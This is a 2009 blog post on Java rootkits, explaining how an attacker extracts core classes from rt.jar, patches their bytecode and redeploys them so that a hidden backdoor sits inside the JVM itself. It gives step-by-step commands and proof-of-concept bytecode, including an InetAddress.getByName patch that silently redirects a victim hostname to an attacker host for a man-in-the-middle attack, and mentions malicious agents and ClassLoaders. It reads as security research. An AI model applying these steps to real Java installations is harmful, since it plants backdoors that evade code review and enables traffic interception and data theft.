Java Rootkits

Posted: 23 August, 2009 in cyber culture, english, life
Tags: , , , , , , ,

This page introduces application level rootkit attacks on Java JVM environment, enabling an attacker to change the language runtime implementation, and to hide malicious code inside its core.

Java Rootkits, injected into the upper level class level code will influence the bytecode and make the application behave differently than what it’s supposed to do. Code reviews will not detect application level backdoors since the payload is not in the code itself, but rather it is inside the JVM implementation.

Java rootkits also enables the attacker to install reverse shells, to steal valuable information, to fixate encryption keys, disable security checks and to perform other nasty things.

Overview of Java JVM modification steps

* Locate the class (usually in rt.jar) and extract it:

jar xf rt.jar java/io/PrintStream.class

* Dissassemble it (using Jasper disassembler)

Java –jar jasper.jar PrintStream.class

* Modify the bytecode
* Assemble it (using Jasmin assembler)

Java –jar jasmin.jar PrintStream.j

* Deploy the modified class back to its location:

jar uf rt.jar java/io/PrintStream.class

Besides performing direct modification of the JVM in order to hide the presence of the rootkit from the application layer, it is possible to achieve similar rootkit-like behavior using Non evasive, “by design” techniques such as:
• AOP – Aspect programming (dynamic weaving)
• Configuration modification
• Setting an alternative evil ClassLoader
• Loading a malicious agent “-javaagent:MyEvilAgent.jar” (Java)

Proof-Of-Concept
Example #1:
the following code was injected into PrintStream.class, at “.method public println(Ljava/lang/String;)V”:

aload_0
aload_1
invokevirtual java/io/PrintStream/print(Ljava/lang/String;)V
aload_0
invokespecial java/io/PrintStream/newLine()V
aload_2

It will make each application level code to println(“value”) to print the string “value” twice.

Steps:
1. Download the modified PrintStream.class (PrintStream.class contains the println method)
2. Go to the JRE directory containg rt.jar
3. Create a temp directory “java/io”, and copy the PrintStream.class to this directory
4. Deploy the modified class using the “jar”command:
jar uf rt.jar java/io/PrintStream.class
5. Download the HelloWorld Demo. It contains one line of code: System.out.println(“Hello World!”);
6. Run HelloWorld, using:
java HelloWorld

Now you should see that the string “Hello World!” was printed twice.

Example #2:
the following code was injected into InetAddress.class, at
“.method public static getByName(Ljava/lang/String;)Ljava/net/InetAddress;”:

aload_0 ;load s into stack
ldc “www.victim.com”
;compare the 2 strings
invokevirtual java/lang/String/equals(Ljava/lang/Object;)Z
ifeq LABEL_compare
ldc “www.attacker.com
astore_0 ;store attacker hostname to stack
LABEL_compare:

It will make each application level code to getByName (in order to resolve hostname -> ip) to spoof the ip address of the victim to be the attacker’s ip.

Steps:
1. Download the modified InetAddress.class (InetAddress.class contains the getByName method)
2. Go to the JRE directory containg rt.jar
3. Create a temp directory “java/net”, and copy the InetAddress.class to this directory
4. Deploy the modified class using the “jar”command:
jar uf rt.jar java/net/InetAddress.class
5. Download the DNS Spoofing Demo.
6. Run the Client on the rooted JVM machine, using:
java Client
7. Run the Server on a machine called “www.victim.com“, using:
java Server
8. Run the Man-In-The-Middle Server on a machine called “www.attacker.com“, using:
java TCPChatMitM
9. Start the real server and the MitM server. Now connect with the client to www.victim.com.

Now you should see that communication flow is ClientMitMServer.

Pay attention – the supplied classes were generated to JRE version 1.6.0_14. To avoid compatibility issues when using the supplied PoC classes use the same JRE version or generate your own classes.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s